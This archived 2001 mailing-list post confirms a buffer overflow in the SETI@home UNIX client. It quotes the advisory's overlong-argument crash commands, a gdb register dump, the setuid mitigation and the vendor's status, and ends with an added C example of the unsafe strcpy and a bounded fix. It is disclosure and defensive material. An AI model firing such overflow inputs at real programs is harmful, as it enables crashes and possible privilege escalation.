Verified on OSX
[dhcp065-024-236-177:~/setiathome-3.03.powerpc-apple.1] elguapo%
./setiathome -socks_passwd `perl -e 'print "A" x 9000'`
Segmentation fault
-KF
On Sunday, December 2, 2001, at 03:15 PM, joetesta_at_hushmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI_at_home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project that
> allows ordinary citizens to participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI_at_home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root_at_seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI_at_home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome' account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project director, Dr. Dave P. Anderson, was contacted via
> <davea_at_ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta_at_hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>
Received on Dec 03 2001
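As an added illustration (not code from the advisory or from the SETI@home client, whose source the post does not show), a hypothetical reconstruction of the unbounded argv-to-fixed-buffer copy the gdb trace points at, beside a bounded replacement that rejects overlong -socks_* values instead of truncating them; SOCKS_FIELD_MAX, the struct and the function names are constructed for the example.

```c
#include <string.h>

/* Hypothetical reconstruction; the advisory shows only the crash in strcpy(),
 * not the client's source. Field size is constructed for the example. */
#define SOCKS_FIELD_MAX 64
struct socks_config { char server[SOCKS_FIELD_MAX], user[SOCKS_FIELD_MAX], passwd[SOCKS_FIELD_MAX]; };

/* Before: strcpy() stops at the source's NUL, never at the destination's end,
 * so an argument longer than the field overwrites the stack beyond it. */
void set_field_unsafe(char *dst, const char *src) { strcpy(dst, src); }

/* After: locate the terminator within dstsz bytes (memchr never reads past
 * that limit), reject rather than truncate, and copy terminator included. */
int set_field_checked(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)
        return -1;                  /* value needs >= dstsz bytes */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Walks "-socks_server V -socks_user V -socks_passwd V" pairs; returns how
 * many values were rejected so the caller can refuse to start. */
int parse_socks_args(struct socks_config *cfg, int argc, char **argv)
{
    int rejected = 0;
    for (int i = 1; i + 1 < argc; i += 2) {
        char *dst = NULL;
        if (strcmp(argv[i], "-socks_server") == 0) dst = cfg->server;
        else if (strcmp(argv[i], "-socks_user") == 0) dst = cfg->user;
        else if (strcmp(argv[i], "-socks_passwd") == 0) dst = cfg->passwd;
        if (dst && set_field_checked(dst, SOCKS_FIELD_MAX, argv[i + 1]) != 0)
            rejected++;
    }
    return rejected;
}

/* Replays the report's 9000-byte -socks_passwd next to a normal -socks_user;
 * returns 1 if the long value was rejected and the short one kept intact. */
int overlong_passwd_is_rejected(void)
{
    static char long_arg[9001];
    struct socks_config cfg;
    memset(&cfg, 0, sizeof cfg);
    memset(long_arg, 'A', 9000);           /* NUL-terminated by static zero-init */
    char *argv[] = { "setiathome", "-socks_user", "bob", "-socks_passwd", long_arg };
    int rejected = parse_socks_args(&cfg, 5, argv);
    return rejected == 1 && strcmp(cfg.user, "bob") == 0 && cfg.passwd[0] == '\0';
}
```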